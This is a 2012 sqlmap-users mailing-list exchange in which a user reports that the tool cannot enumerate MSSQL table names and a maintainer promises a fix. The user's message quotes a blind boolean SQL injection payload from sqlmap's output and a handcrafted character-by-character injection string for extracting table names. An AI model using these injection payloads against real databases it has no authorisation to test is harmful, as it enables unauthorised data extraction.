Re: [sqlmap-users] Can't dump tables from an mssql server

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi Cats.

Please, wait for day or two and you'll hopefully be able to use sqlmap in
that case too.

Kind regards,
Miroslav Stampar

On Mon, Jan 2, 2012 at 8:01 PM, cats <du...@al...> wrote:

> I can dump users and databases, but not the tables in any database.
>
> Here's some output from sqlmap:
>
> Revision: 4643
>
> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
>
> [18:58:04] [INFO] fetching tables for database: productcatalog
> [18:58:04] [INFO] fetching number of tables for database
> 'productcatalog'
> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> eservice_productcatalog..sysobjects WHERE xtype IN
> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
> [18:58:05] [DEBUG] reflective value found and filtered out
>
> It just goes on like this and simply spits out a "retrieved" which is
> empty, and it will continue doing so until it has reached the length of
> the current table. Thus the result will be something like:
>
> dbo.""
> dbo.""
> dbo.""
>
> ...and so on
>
> I wrote a Perl script that could successfully extract the tables from my
> database, using the following injection string.
>
> Clean version of the injection:
>
> AND (
> CASE
> WHEN SUBSTRING((
> SELECT TOP 1 TABLE_NAME FROM (
> SELECT TOP ' . $i . ' TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>
> So the important part is "SELECT TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
> WHERE xtype = 'U'" Doesn't seem to work for me.
>
> Has anyone else had this issue?
> Am I doing something wrong, or is this a bug in sqlmap?
> Or maybe it's the configuration on my mssql server?
>
> Anyway, advice is welcome :-)
>
> Cheers!
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

-- 
Miroslav Stampar
http://about.me/stamparm